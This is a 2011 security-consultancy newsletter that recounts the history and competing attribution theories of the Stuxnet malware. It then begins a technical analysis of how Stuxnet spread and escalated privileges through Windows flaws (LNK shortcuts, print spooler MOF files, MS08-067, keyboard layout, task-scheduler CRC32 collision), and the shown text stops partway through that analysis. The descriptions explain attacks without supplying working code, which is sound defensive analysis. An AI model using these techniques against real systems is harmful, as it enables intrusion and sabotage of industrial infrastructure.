Stuxnet. analysis, myths, realities

ACTUSÉCU 27 XMCO

David Helan
S
ND REALITIE
IS, MYTHS A
: ANALYS
STUXNET

C ON TEN TS
S t u x n et : c om p l e te two-p a rt ar t icle o n T HE vir us o f 2010

K ey b o ard L ayo u t : a n a l ysi s of t he MS10-073 vulner abilit y used by St ux ne t

C u r re n t n e w s : Top 10 ha c king t echniques, z ero -day IE, Gsdays 2 0 1 0 ,
P ro FTP D. ..

B l o g s , s o f t wares an d o u r fav orite Twe e ts...

This document is the property of XMCO Partners. Any reproduction is
strictly prohibited. !!!!!!!!!!!!!!!!! [1]

ACTU SÉCU 27

A re y o u c o n c e r n e d b y I T s e c u ri t y i n y o u r c o m p a n y ?

XMCO Partners is a consultancy whose business is IT security audits.

Services:

Intrusion tests
Our experts in intrusion can test your networks, systems and web applications
Use of OWASP, OSSTMM and CCWAPSS technologies

Security audit
Technical and organizational audit of the security of your Information System
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley

PCI DSS support
Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification.

CERT-XMCO: Vulnerability monitoring
Personalized monitoring of vulnerabilities and the fixes affecting your Information System

CERT-XMCO: Response to intrusion
Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy

About XMCO Partners:

Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a
commitment to achieve results.
Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing.

At the same time, we work with senior management on assignments providing support to heads of information-
systems security, in drawing up master plans and in working on awareness-raising seminars with several large
French accounts.

To contact XMCO Partners and discover our services: http://www.xmco.fr
WWW.XMCO.FR


FEB. 2011
EDITORIAL N UMBER
2 7

We wish you a happy 2011…
ACTUSECU
This is the first issue of ActuSécu certainly be implementation errors
in 2011. As usual, a very busy that may be exploited by pirates,
year end made us a little late in especially as these are particularly Editor in chief:
writing this issue. ingenious concerning hacking Adrien GUINAULT
means of payment.
The XMCO team is strengthened Contributors:
with the arrival of Florent We hope that you find this issue Charles DAGOUAT
Hochwelker, a security consultant interesting and we look forward to Florent HOCHWELKER
coming from SkyRecon. The seeing you at Black Hat Stéphane JIN
security of the Windows kernel, Barcelona, for which XMCO is a François LEGUE
DEP bypass and other tricks for partner. Frédéric CHARPENTIER
happily causing memory overflows Yannick HAMON
no longer hold any secrets for him. Frédéric Charpentier
Florent has also written its first Chief Technology Officer

article in this issue.
CONTACT XMCO
What will 2011 bring us in terms of actu_secu@xmco.fr
attacks and security? Without info@xmco.fr
wishing to gaze into a crystal ball,
it is clear, for me, that 2011 will be THE XMCO AGENDA
the year of m-payment:
contactless mobile payments (by PCI DSS QSA TRAINING
NFC or GSM). Although these 7 and 8 March in London

technologies are, a priori, new, BLACKHAT EUROPE
they are based on existing and 16 and 17 March in Barcelona
proven frameworks. There will

BLACK HAT

STUXNET PART I
P. 5 BOOKMARKS
AND
TOOLS
P. 52

P. 13 CONTENTS
STUXNET...
...PART II
Stuxnet Part I: analysis, myths and realities..5
An examination of THE virus of 2010

Stuxnet Part II: technical analysis.................13
Propagation, infection and attacks on industrial
systems.

Keyboard Layout vulnerability......................29
Analysis of the "elevation of privileges" vulnerability
KEYBOARD
P. 29
used by Stuxnet (MS10-073).

LAYOUT
Current news..................................................38
Top Ten hacking techniques, zero-day IE, GS Days,
ProFTPD...

Blogs, software and extensions...................52
IMA, VMware compliance checker, Twitter and the
rn_101 blog.

CURRENT XMCO 2011

NEWS P. 38

ACTU SÉCU 27

STUXNET PART I : ACTU SÉCU 27
Stuxnet, elected malware of
the year
HISTORY, MYTHS AND It would have been

REALITIES
inconceivable not to devote an
article to THE malware of the
year 2010.

Although nearly everything has
already been said on this
subject, we could not resist
wanting to write an article on
Stuxnet several months after
the media buzz has subsided.

Much is still obscure
concerning this malware, its
origins and its developers.

However, we will try to give a
summary, also taking an
objective view in relation to
various papers covering the
Karsten Kneese

subject.

To quickly reach its target, the malware also uses a
If there is one thing to remember about 2010, it is surely
password defined by default within certain SCADA
the case of Stuxnet. This is because this malware,
(Supervisory Control And Data Acquisition) systems.
specifically produced to carry out the second highly-
This is based on the Siemens SIMATIC WinCC
publicized targeted attack of 2010 (after Aurora)
software.
caused comment for more than six months! This article
is intended as a summary of this long period, which was
punctuated by many new developments. It covers the “Stuxnet is a complex piece of malware
development of the discoveries and announcements constructed from many items, intended to
that took place during this period and tries to analyze all sabotage the normal functioning of certain
the facts in order to draw conclusions. Between
reminders on technical matters, genuine rumors and critical systems. ”
false realities, this article will appraise the situation as Thanks to all the work performed by various
completely as possible. researchers with an interest in malware, the role of
Stuxnet has been clarified. The malicious code acts in
Preliminary reminders several stages: firstly, a removable item of storage
media is used to compromise a system on a local
Stuxnet is a complex piece of malware constructed from network. Once present on a network, the malware
many items, intended to sabotage the normal replicates, moving towards the discovery of a point of
functioning of certain critical systems. In contrast to access to its target: a system on which WinCC is
the somewhat indiscreet approach which is used to installed.
WWW.XMCO.FR

access these sensitive systems, this sabotage is
intended to be very discreet. Secondly, when such a target is discovered, the
To approach its target, Stuxnet exploits at least four behavior of the various items controlling the target
zero-day vulnerabilities (currently all corrected by architecture is modified in order to physically impair
Microsoft) targeting different versions of Windows, as the integrity of the industrial production system. In the
well as the famous MS08-067 vulnerability that was case of Stuxnet, this concerns modifying the normal
corrected several years ago. function of certain critical systems by manipulating their
controllers.


STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27

History the Metasploit framework. This allowed control of a
system to be taken over remotely by exploiting the
It is difficult to create a comprehensive history of the security vulnerability through WebDAV sharing. This
events relative to Stuxnet because of the numerous code allowed a pirate simply to encourage an Internet
new developments and announcements during this long user to visit a web page with Internet Explorer to take
period. Limiting ourselves to the dates of the control of the underlying system. The same day
discoveries made and publicized by the researchers Symantec renamed W32. Temphid to W32.Stuxnet, and
would not really make sense. It is necessary to consider Siemens reported that the company was in the process
the period before the media took an interest in this of studying reports referring to the compromise of
subject, as this attack is so complex. We are therefore several SCADA systems linked to WinCC.
going to try, with hindsight, to trace a history that takes
into account the dates before the beginning of the On 20 July, Symantec announced that it had
media interest in this sabotage campaign. Also, all this discovered how the malware communicated with its
takes into account discoveries made after this attack command and control (C&C) servers, and the meaning
attracted media interest. of the exchanged messages.

On 21 July, MITRE assigned reference
From Stuxnet CVE-2010-2772 to the security vulnerability present
within the Simatic WinCC and PCS 7 software from
Everything officially began on 17 June 2010, when the Siemens. A password had been hard-coded and could
Belarusian company Virusblokada published a report on be used to access certain components of Siemens
the virus RootkitTmphider, mentioning the LNK applications with elevated privileges.
security vulnerability. This vulnerability, which was
zero-day in June 2010, allows a pirate to execute code Two days afterwards, on 23 July, VeriSign revoked the
when opening a directory, whether it is shared (SMB, certificate belonging to JMicron Technology Corp.
WebDAV), local or on a mass-storage peripheral
(external hard disk, USB drive, portable telephone, MP3
player, etc.). The vulnerability gradually began to “On 17 July, Symantec renamed
arouse comment. MITRE dedicated reference
"W32.Temphid" as "W32.Stuxnet" and
CVE-2010-2568 to it the following 30 June, and on 13
July, Symantec added the detection of this virus under Siemens reported that the company was in
the name of W32. Temphid. the process of studying reports referring to
the compromise of several SCADA systems
The next day, on 14 July, MITRE assigned references linked to WinCC ”
CVE-2010-2729 and CVE-201 0-2743 to security
vulnerabilities present in the print spooler and in the
keyboard management. Two days afterwards, on 16 Then several days passed, during which the
July, Microsoft published a security alert referenced researchers and specialists involved in this study
KB2286198. This last concerned the security certainly did not stop working. On 2 August, outside its
vulnerability exploited by the malware. The "Patch Tuesday" cycle, Microsoft published its security
management of LNK files was then clearly identified as bulletin MS10-046 proposing several patches for the
problematic by the software publisher. At the same time, LNK vulnerability. On 6 August, Symantec presented
VeriSign revoked the certificate belonging to Realtek the method used by Stuxnet to inject and hide code on
Semiconductor Corp. This was because it had been a PLC (Programmable Logic Controller).
used by pirates to sign certain drivers used by their
malware. Symantec subsequently revealed that the first On 14 September, Microsoft published a new security
malware, which had a driver signed by the certificate bulletin (MS10-061) and offered a patch for the security
and which was identified as coming from the Stuxnet vulnerability present within the print spooler that was
family, went back to January 2010. discovered by Symantec in August. The same day,
MITRE assigned reference CVE-2010-3338 to the
On 17 July, the antivirus publisher ESET detected new "elevation of privileges" vulnerability that was identified
malware coming from the Stuxnet family. This used a within the task scheduler.
certificate belonging to JMicron Technology Corp. to Just several days afterwards, on 17 September,
sign one of its components. On 19 July, a year after Joshua J. Drake (jduck1337) published exploitation
ivanlefOu had published a proof of concept, the code within the Metasploit framework. This allowed
researcher HD Moore published exploitation code within control to be taken of a system via the security

strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6]


vulnerability present within the Windows print spooler. knowledge that was necessary, the human and
Lastly, to end the month of September, the publishers of material resources necessary and lastly, the cost of
the antivirus solutions ESET and Symantec published a such an organization make certain countries ideal
ﬁrst version of their report, on 30 September, suspects. Among the list chosen by the researcher were
presenting their almost-complete analyses of the Israel, the United States, Germany and Russia.
malware. In fact, both publishers did not wish to
disclose information on vulnerabilities that had not yet

Trey Ratcliff
been corrected by Microsoft.
The following month, on 20 November, Joshua J.
Drake published new exploitation code within the
Metasploit framework to exploit the vulnerability present
within the Windows task Scheduler.
Finally, to prevent the exploitation of the last security
vulnerability exploited by Stuxnet, Microsoft, on its
"Patch Tuesday" of 12 October, published its security
bulletin MS10-073 that gave a patch for the vulnerability
related to the management of the keyboard. Then, after
two months of waiting, in its "Patch Tuesday" of 14
December, Microsoft published its security bulletin
MS10-092 offering a patch to correct the security
vulnerability related to the task scheduler.

The progress made by Ralph Langner

Thanks to the work done by the German researcher
Ralph Langner, which began as soon as the media
began to take an interest in the malware, it has been
possible to identify numerous trails related to the origin
of Stuxnet, to its potential targets and to the people who
are hiding behind this attack. Of course, all information
published by this former psychologist should be treated
with caution. Even so, it appears, with hindsight, that
many opinions that he gave have been subsequently
validated by other researchers (such as Symantec) or
by documents coming from third-party sources.
On 15 November, Langner presented a technical
On 16 September, Langner announced that Iran, and
solution allowing the malicious code 315 to destroy
particularly the nuclear power station at Bushehr,
gas centrifuges. He was then supported by the nuclear
which was built in cooperation with Russia, was the
specialist from ISIS (Institute for Science and
main target. The researcher was also the ﬁrst to speak
International Security), David Albright. On the same day,
of cyber war. On each following day, he published new
a second announcement gave the details of the attack
hypotheses and new discoveries. The researcher
performed by the code 417. In the days that followed,
approached numerous entities, such as Congress, the
numerous details of this second attack were presented
DHS and the INL in the United States, and also
and a hypothesis concerning the targets was given:
appeared on television. On 13 November, Langner
according to the researcher, the code 315 targeted the
announced, just after Symantec, that he had come to
IR-1 centrifuges present in the Natanz enrichment
the same conclusions concerning the malicious code
centre, while module 417 targeted the steam turbines in
315 and the PLCs targeted. He took advantage of this
WWW.XMCO.FR

the electrical power station at Bushehr. A single
to present the K-1000-60/3000-3 steam turbines
weapon, malware, which contained two payloads: the
manufactured by the Russian manufacturer "Power
code modules 315 and 417, targeting different PLCs.
Machines" which, according to him, equipped the
Bushehr nuclear plant. The following day, he presented
At the end of November, the former psychologist
his analysis concerning the entity that probably ordered
announced that Iran and Venezuela had concluded an
this attack: for him, only a government could have been
agreement in 2008. This alliance allowed Iran to install
involved in such a scenario: the complexity of the
ballistic missiles on Venezuelan territory in exchange for



the help provided by Iran in setting up a nuclear agreement, one month before the end of his term of
program in the host country. A situation in which the office in January 2009, to the establishment of a
United States would surely not be delighted to find secret program aiming to sabotage the electrical and
itself; and therefore, in his opinion, a justification for the computer systems at the main uranium enrichment
establishment of this secret program. centre at Natanz. From the beginning of his term of
office, Barack Obama, who had been informed of this
At the end of December, helped by the publication of before taking office, accelerated this program on the
the report from ISIS, which gave an analysis of the advice of those knowledgeable concerning the case of
nuclear infrastructure situation reported by the Iran.
inspectors from the International Atomic Energy Agency
(IAEA ), Langner announced that he had discovered
the precise target of the malware, and more precisely,
of block 417. This was the safety system associated
with cascades of centrifuges used to enrich uranium. In
his opinion, the PLCs targeted were used every two
years in the functioning of an enrichment centre such as
Natanz.

Trey Ratcliff
“A single weapon, malware, which
contained two payloads: the code modules
315 and 417, targeting different PLCs ... ”

At the beginning of January, the researcher presented a
new hypothesis on the role of blocks 315 and 417.
According to him, their main objective was not the
destruction of the centrifuges, but rather to make these
production systems massively inefficient. By
analyzing the data embedded in the code, and
theoretical calculations on the yield of uranium
production, the researcher discovered that the
operations performed by the two blocks of code would
drastically reduce the yield of the centrifuges.

To summarize, over the course of these few months,
Langner was probably the researcher who
communicated most concerning Stuxnet.

Still according to the New York Times journalists, this
The "New York Times" theory program was based on work performed at the Idaho
National Laboratory (INL) in partnership with the
For the first time since the beginning of this scenario, an Department of Homeland Security (DHS) and Siemens.
article published by the New York Times on 16 January During 2008, they claim that Siemens requested the
described a plausible scenario. Even though this INL to test the security of its Step7 software used to
scenario is based more on a correlation between events control a set of industrial systems (tools, probes, etc),
and facts, rather than on tangible proof, these authors using controllers such as PCS7 (Process Control
WWW.XMCO.FR

have the distinction of being among the first to officially System 7). The results obtained, including numerous
name the various protagonists. It should therefore be security vulnerabilities, were presented in July at a
taken with caution and is the responsibility only of the conference that was held in Chicago.
journalists who wrote the New York Times article.
Several months later, American diplomacy succeeded in
In this scenario, the United States set up a plan to establishing an embargo on certain components
hinder Iran in its quest to produce nuclear weapons. necessary to the correct functioning of a uranium
According to the journalists, President Bush gave his enrichment centre. According to a diplomatic cable



revealed by Wikileaks, in April 2009, 111 Siemens Israel of having ordered these assassinations. After this
controllers necessary to controlling a uranium second suspect event, the Iranians took the decision to
enrichment cascade were therefore blocked at the port "hide" Mohsen Fakrizadeh, the third (and last?)
of Dubai in the United Arab Emirates. nuclear specialist.

At the end of 2010, the Institute for Science and

Ludo Benoit
International Security (ISIS) reported that 984 defective
controllers had been replaced at the end of 2009
according to a report by inspectors from the IAEA.
Strangely, this figure exactly corresponds to the number
of Siemens controllers contained within an enrichment
cascade. Nevertheless, what is the relationship
between these 984 defective controllers and Stuxnet?
These controllers were replaced between the end of
2009 and the beginning of 2010, while Stuxnet made its
first public appearance at the beginning of 2010
although it was not yet identified.

The article presents Israel as a principal ally of the
United States in manufacturing and testing this
malware. This "small" country, which is highly advanced
technologically, and particularly in cyber-warfare, is
alleged to have built a replica of the Natanz enrichment
centre in its own nuclear research centre: Dimona. The
journalists gave two reasons for this alliance. Among
the Americans' other allies, none of them would be able
to make the IR-1 centrifuges work properly. These were
derived from the Pakistani P-1, which themselves were
copied from plans of the German G-1 stolen by the
doctor of physics Abdul Qadeer Khan (father of the
Pakistani nuclear bomb and in charge of a network
specialized in the sale of nuclear material that helped to
spread sensitive technology to Iran, North Korea and
Libya). The second reason was that Israel had long
been openly seeking to prevent Iran from obtaining Forbes's counter theory
nuclear weapons.
Another article published by journalists at Forbesʼ the
following day strongly criticized this analysis. According
“In this scenario described by the Times, to them, this was based on no tangible proof. Only
gestures made by certain diplomats at press
the United States is alleged to have set up a conferences and the content of several diplomatic
plan to hinder Iran in its attempt to cables revealed by Wikileaks gave any support to the
journalists' article.
produce nuclear weapons. ”
The journalists took advantage of trashing this theory to
According to the authors of this article, other information push their own analysis that was published in
revealed the magnitude of this American program. December. According to them, the "real" powers behind
Massoud Ali Mohammadi, an Iranian nuclear Stuxnet were Finland and China. The reasoning behind
specialist, was killed in January 2010 by an explosion this was that Vacon, the Finnish manufacturer of
WWW.XMCO.FR

caused by a remotely-triggered bomb fixed to a frequency converters (variable frequency drives) had
motorbike. On 29 November 2010, when Iran a manufacturing plant in China. This would mean that
recognized for the first time that Natanz had suffered China would know precisely which PLCs to target.
damage related to Stuxnet, a second physicist, Majid Furthermore, China is suspected to have access to part
Shahriari, was the victim of a second fatal "accident". of the source code of Windows, which could explain the
On both of these occasions, president Mahmoud discovery and use of four zero-day vulnerabilities.
Ahmadinejad directly accused the United States and



Numerous other details relating China and Finland were and rescue, was controlled by a SCADA system based
also revealed by the journalists to support their theory. on Siemens S7-400 and SIMATIC WinCC PLCs. This
For example, RealTek Semiconductor, the Taiwanese announcement occurred during a complex period in
company whose certificate was stolen to sign the Indo-Chinese relationships, because both countries are
drivers, has an establishment in the industrial zone of fiercely competing with each other in the aerospace
Suzhou, in China, not far from Vacon. Finally, China sector to be the first Asian country to put a man on the
was relatively untouched by the worm. moon.

Although Symantec and other publishers of anti-virus
software named Iran as the main victim of Stuxnet, it
was not before mid-October that the subject of Stuxnet
was publicly mentioned by Iran. During this first speech,
the Iranian president simply denied the damage that the
worm was supposed to have caused to national
infrastructure. A month later, in November, the country
recognized for the first time that it had suffered
"slight" problems leading to the postponement of the
launch of the Bushehr plant. In reaction to this attack,
the government arrested some Russian service
contractors suspected of being spies. These were
subsequently released

Since the beginning of 2011, numerous other events
were added to this story. Symantec, by recovering
samples obtained from various publishers of antivirus
software in the market, was able to make a statistical
study of the attacks.

So, thanks to the 3,280 samples recovered from ESET,
F-Secure, Kaspersky, Microsoft, McAfee and Trend

Ludo Benoit
Micro, Symantec was able to draw the following
conclusions:
- exactly five organizations were targeted;
Lastly, very many international experts criticized the these five organizations are all present in Iran;
quality of the code in the malware. Several - most of the 12,000 infections corresponding to the
commentators criticized the amateurism of certain 3,280 samples can be traced to these various
functionalities of Stuxnet: the very basic component that organizations;
communicates with the C&C servers (for example, no - among the victims used as vectors for propagation,
communications encryption, the lack of robustness of three were attacked once, one was targeted twice and
the control servers, etc), the absence of additional the third was attacked three times;
protection (polymorphism, anti-debug and robust - these attacks took place at very precise dates: in June
encryption), and finally an indiscreet means of 2009, one month later in July 2009, then at three further
proliferation that is unworthy of an attack carried out stages in March, April and May 2010;
discreetly by the military, etc. According to these - lastly, three variants of the malware corresponding to
commentators, just these observations are evidence the attacks that took place in June 2009, April 2010 and
that no government is hiding behind Stuxnet. May 2010 were observed. The existence of a fourth
variant is assumed but has not been observed among
WWW.XMCO.FR

the samples obtained.
According to Symantec, these five companies are
The other factors to be remembered suppliers with links to the Natanz enrichment centre.

On 9 July, the Indian satellite INSAT-4B was declared From these samples Symantec was able to produce
inoperable. This satellite, which was used for graphs representing the proliferation of the malware.
transmitting telecommunications, television For this, the researchers used the information recorded
broadcasting, meteorology and for individual search (date and time, for example) by the malware when it



infects a new system. These graphs clearly highlight the
five dates corresponding to the attacks and the number
of targets initially contaminated during each of these
events.

“In April 2009, the researcher Carsten
Kohler published an article in the
magazine Hackin9 presenting a security
vulnerability within the Windows print
spooler. No one reacted, not even
Microsoft, which was clearly concerned. ”

The day after this announcement, several media
echoed another announcement that was particularly
surprising. During a video shown at a party given in
honor of the retirement of general Gabi Ashkenazi, and
published by the conservative newspaper Haaretz, it
was claimed that the newly-retired general had
supervised the creation of Stuxnet. Nevertheless, as
no official Israeli source has corroborated this
announcement, it must be taken with caution.
Lastly, it was in March 2010 that the first malware in the
Stuxnet family appeared which exploited the LNK
The warning signs vulnerability.

The Stuxnet affair began well before 2010. Thus,
Symantec was able to find traces of the malware going
back to 2008. On 20 November 2008, Symantec Conclusion
observed the exploitation of the LNK vulnerability for
the first time. This had not been analyzed at the time Stuxnet has caused a lot of comment and been
and we had to wait until the appearance of Stuxnet to
highly publicized. The various theories, analyses
discover that pirates had known about this vulnerability
for more than two years. The virus in question was then and hypotheses made until now do not allow any
identified as "Trojan.Zlob" and does not appear to be conclusions to be drawn with certainty, either
related to Stuxnet. concerning those ordering the attacks or the
targets. However, according to the various
In April 2009, the researcher Carsten Kohler published
an article in the magazine Hackin9 presenting a discoveries made by several researchers and
security vulnerability within the Windows print journalists (Symantec, Langner and the New York
spooler. No one reacted, not even Microsoft, which
Times), Iran seems to have been targeted,
was clearly concerned! Several months later, in June
2009, Symantec detected a new malware that is now especially the nuclear enrichment centre at Natanz.
identified as the first version of Stuxnet. This was very Concerning those ordering the attack, and bearing
simple and did not carry all of the payloads that we in mind its complexity, the resources used and the
know today. According to Symantec, it was in January
2010 that the first malware in the Stuxnet family different information revealed by the journalists,
appeared using the certificate from Realtek Israel and the USA appear to have played a role in
WWW.XMCO.FR

Semiconductor Corp. to sign one of the components of this affair. We must also bear in mind that all of the
the malware.
information revealed by the various observers is
always subjective…



References

Resources on Stuxnet
http://blog.eset.com/2011/01/03/stuxnet-information-
and-resources

F-Secure (FAQ)
h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s /
00002040.html

h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s /
00002066.html

"
Timeline
http://www.infracritical.com/papers/stuxnet-timeline.txt
"

CERT-IST
h t t p : / / w w w. c e r t - i s t . c o m / f r a / r e s s o u r c e s /
Publications_ArticlesBulletins/VersVirusetAntivirus/
stuxnet/
"
"
New York Times
http://www.nytimes.com/2011/01/16/world/middleeast/
16stuxnet.html?pagewanted=all

30tehran.html?pagewanted=print
13iran.html?_r=1&pagewanted=print
"

Forbes
http://blogs.forbes.com/jeffreycarr/2011/01/17/the-new-
york-times-fails-to-deliver-stuxnets-creators/?
boxes=Homepagechannels

http://blogs.forbes.com/ﬁrewall/2010/12/14/stuxnets-
ﬁnnish-chinese-connection/
WWW.XMCO.FR


ACTU SÉCU 27

STUXNET PART II: Stuxnet, elected malware of the
year

TECHNICAL ANALYSIS After having looked at the
history of Stuxnet and the
theories and assumptions behind
it, let us now look at its
technical analysis.

Some very good white papers
(Symantec and ESET) have given a
detailed presentation of the
complexity of this malware.

We will try to summarize
everything to give an
understanding of the propagation
modes used, the relationships
with industrial systems and the
consequences that Stuxnet may
cause.
Bjoern Schwarz

Charles Dagouat

The second phase corresponds to the attack itself: this
General functioning is the search for a target.

Stuxnet is a complex piece of malware. Its functioning
mode revolves around two main "functions": the “Stuxnet is a complex piece of malware. Its
propagation of the virus, which is based upon the
vulnerabilities inherent in the Windows platform, and the functioning mode revolves around two
attack on SCADA systems, which is focused on WinCC main "functions": the propagation of the
and PCS7. virus, which is based upon the
vulnerabilities inherent in the Windows
This second function corresponds to the payload
transported by the malware. It is based on the software platform, and the attack on SCADA
component WinCC. WinCC is a very widespread tool systems, which is focused on WinCC and
for remote monitoring and data acquisition developed PCS... ”
by Siemens. Installed on a Windows system, it is used
to control an automatic system such as a
In the case of Stuxnet, the target is a Siemens WinCC
Programmable Logic Controller (PLC). This type of
control and monitoring system linked to certain PLCs. If
architecture is particularly adapted to critical
such a system is detected, its behavior is then
infrastructure such as can be found in industry.
discreetly impaired. Lastly, the final phase corresponds
WWW.XMCO.FR

to the material consequence of this modification. The
To fulfill its task, Stuxnet's functioning is governed by a
undetectable effect discreetly acts on the system in
very specific scenario. The architecture of the malware
order to slowly destroy it.
is built around several main functionalities that
correspond to the different stages in the attack process.
The first stage is not characteristic of Stuxnet, but
corresponds to the majority of worms: it is the
propagation phase. During this phase, the malware
seeks to spread within a given area. the local network.


STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27

Phase I: malware propagation Exploitation of this vulnerability simply requires a user
to open a malicious directory. Exploitation code has
Phase 1 of the attack carried out by Stuxnet therefore already been published within the Metasploit
corresponds to the proliferation of the malware within framework.
an installed base of computers. For this, the authors of
Stuxnet used no less than four zero-day vulnerabilities Using this, a pirate only needs to get an Internet user to
targeting various components of Windows. But this access an Internet address with Internet Explorer to
propagation function may itself be subdivided into take control of the remote system. In this proof of
several sections: the first corresponds to compromising concept, the server forces the client to open a shared
Windows systems and the second corresponds to the file using the WebDAV protocol.
long-term installation of the virus on a compromised
system.
“The authors of Stuxnet used no less than
The main points of entry chosen by the developers of four zero-day vulnerabilities targeting
Stuxnet to penetrate the target infrastructure are
removable storage media such as USB drives and various components of Windows... ”
other portable hard drives. Those behind the attack are
therefore mainly relying on human intervention to carry
the virus from one system to another. A user observing the content of a USB drive infected by
Stuxnet can see the following six files:
- Copy of Shortcut to.lnk ;
Main attack vector: removable storage media - Copy of Copy of Shortcut to.lnk ;
- Copy of Copy of Copy of Shortcut to.lnk ;
The vulnerability in question is related to how the - Copy of Copy of Copy of Copy of Shortcut to.lnk ;
Windows operating system manages shortcuts. This - ~WTR4141.TMP ;
type of file corresponds to the extensions ".LNK" and - ~WTR4132.TMP.
".PIF". More precisely, the vulnerability relates to the
way that the icon for the link is loaded. This image is The various shortcuts entitled "Copy of (... ) Shortcut
normally loaded from a CPL (Windows Control Panel) tO.lnk" correspond to different versions of Windows.
file using the system function "LoadLibraryW()". In These links all load the library "-WTR4141.tmp" which,
reality, a CPL file is just a DLL. By specifying the in turn, loads the file "-WTR4132.TMP".
appropriate information as the access path to a
malicious DLL in the section "File Location Info" of a
LNK file, a pirate is therefore able to force any Windows
system to execute arbitrary code by simply displaying
the content of a directory.

After having officially acknowledged the security
vulnerability by publishing the security alert referenced
KB2286198 on 16 July, Microsoft quickly reacted by
WWW.XMCO.FR

publishing its bulletin MS 10-046 and the associated
patches on 2 August, outside its "Patch Tuesday",
which was planned for eight days later, the following
10 August.



Additional attack vectors: local network installed on a Windows system, the malware has
several functionalities that allow it to work as part of a
However, Stuxnet does not only rely on help from users network. Among these, the malware installs an RPC
to spread. For this, it also uses two other security faults server that allows it to communicate various items of
that can be remotely exploited within a local network. information with other infected systems present on the
The first relates to the Microsoft print spooler, while the LAN.
second targets the old vulnerability present within the
server service (MS08-067).

Print spooler

This security vulnerability was initially presented in the
INFO
magazine Hackin9 during 2009. When a printer is Provision of free tools for getting rid of
shared on a system, a user is able to "print" (read and malware, including Stuxnet.
write) files in the "%System%" directory. Exploitation of
this security vulnerability takes place in two phases. The BitDefender and Microsoft have just made
first consists of depositing the files "winsta.exe" and free tools available for getting rid of
"sYsnuIlevnt.m0f" respectively in the directories the most currently-fashionable malware.
"WindowsSystem32" and "WindowsSystem32wbem
After publishing a tool last month for
mof".
getting rid of Zeus (see CXA-2010-1211),
BitDefender has just published another
The second phase in exploiting this vulnerability tool for deleting the Stuxnet malware.
consists of executing the script "sysnullevnt.mof". This As a reminder, the malware was detected
file, in MOF ("Managed Object Format"), is used to for the first time by a company based in
force Windows to execute the code contained in the file Belarus (see CXA-2010-0893), following
"winsta.exe". Execution of this script is automatic. This the discovery of the zero-day LNK
is because the MOF files placed in the directory security vulnerability affecting all
"WindowsSystem32wbemmof" are automatically versions of Windows (see CXA-2010-0906).
compiled by "mofcomp.exe" to record the WMI context
that triggers the execution of the script. Microsoft has just updated its
"malicious software removal tool", which
This security vulnerability was corrected by Microsoft
can now deal with the most virulent
when it published its bulletin MS10-061, which added a botnet that is currently known: Zeus/
series of checks before allowing a document to be ZBot. Zeus is malware that is constantly
printed. being developed, and which mainly aims
to steal banking information.

Server service The two tools can be downloaded via the
following links:
Lastly, Stuxnet exploits the old MS08-067 security
vulnerability in the server service. This vulnerability, Sutxnet :
which at the time was massively exploited by Confikerl http://www.malwarecity.com/community/
index.php?app=downloads&showfile=12
Downadup, is used here to deposit a file in shared
directories of the C$ or Admin$ type. The execution of
this file is planned the day following compromise, using Zbot :
the task scheduler. It appears that the shell code used http://blogs.technet.com/b/mmpc/archive/
by the malware to carry out these two actions is 2010/10/12/msrt-on-zbot-the-botnet-in-a-
relatively advanced, in contrast to that which was used box.aspx
by Confiker.
WWW.XMCO.FR

This security vulnerability was corrected by Microsoft
when it published bulletin MS08-067.
" " "
The exploitation of these various security vulnerabilities
allows malware to distribute itself both on a local
network and, more widely, on all systems on which
users can connect removable storage media. Once



Phase II: installation of the malware
Stuxnet therefore adds a task which calculates the
The long-term installation of the malware requires associated CRC32 hash, "manually" changes the file to
certain actions that involve elevated privileges. The raise the privileges associated with it, adds a comment
exploitation of the security vulnerabilities presented field and fills it with random data to provoke a collision.
previously does not allow elevated privileges to be The task is then executed with the highest privileges.
obtained. In order to ensure maximum dissemination,
two security vulnerabilities are therefore exploited by This security vulnerability was corrected by Microsoft
Stuxnet in order to elevate its privileges once the when it published bulletin MS10-092, which changed
system has been compromised. the hash function used. The CRC-32 hash function was
replaced by SHA-256. This algorithm is considered
These two vulnerabilities cover all existing versions of secure against collision attacks.
Windows. The first can locally elevate its privileges on
old versions of the operating system: There remains an unknown factor. According to
Windows 2000 and XP; while the second can perform Microsoft, these two security vulnerabilities respectively
the same operation on more recent versions of the OS: targeted Windows XP and 2000 for the keyboard
Windows Vista, 7 and 2008. management, and Windows Vista, 7 and 2008 for the
task scheduler. It would appear that the technique used
The first vulnerability relates to the way the keyboard by Stuxnet to install itself on Windows Server 2003 is
is managed by the driver "Win32k.sys". An index is unknown, or that the malware has excluded this
loaded from a shared library without verification. This platform from its targets.
operation allows the malware to force the system's
kernel to execute code controlled from the user area.
This security vulnerability is described in detail in the
article on page 29 and was corrected by Microsoft when
Ludo Benoit

it published its bulletin MS10-073, which added a check
to prevent the use of an index that overflowed the table
of associated data.

The second vulnerability relates to the task scheduler.
The definition of a task is stored in an ordinary XML file
contained in the directory "%SystemRoot%
system32Tasks". Access to this directory is restricted.
Even so, an XML file (corresponding to a task)
contained in it is accessible and can be written to by the
user who added it. Secondly, the description XML file
contains, among other things, information related to the
execution of the task; for example: the user and the
required level of privileges. A user who defined a task
can therefore freely change the identifier of the user
and the level of privileges required, in order to elevate
privileges.

To protect against this type of attack, Microsoft
therefore introduced a "security feature" which
calculates a hash of the file corresponding to a task
when it is defined. This is checked before the task is
executed. But the CRC32 algorithm used for
WWW.XMCO.FR

calculating this hash is unfortunately not designed for
operations related to security. It is too weak to fulfill this
role because it is relatively easy to implement collisions.
It is actually nothing more than a straightforward CRC
calculation of the XML file. By adding data into a
commented field, it is therefore easy to produce a valid
file with the same hash as the original, after it has been
modified.



Functioning of the malware proliferation have been added to it by its designers.
Among these are functionalities allowing it to spread,
The malware can be decomposed into several files. The hide itself and lastly to update itself. These correspond,
main module, which takes the form of a DLL, is packed overall, to the various functions (21) exported by
with UPX. This module is executed at the start of an Stuxnet's main module:
attempt at compromise, whatever the vector (USB
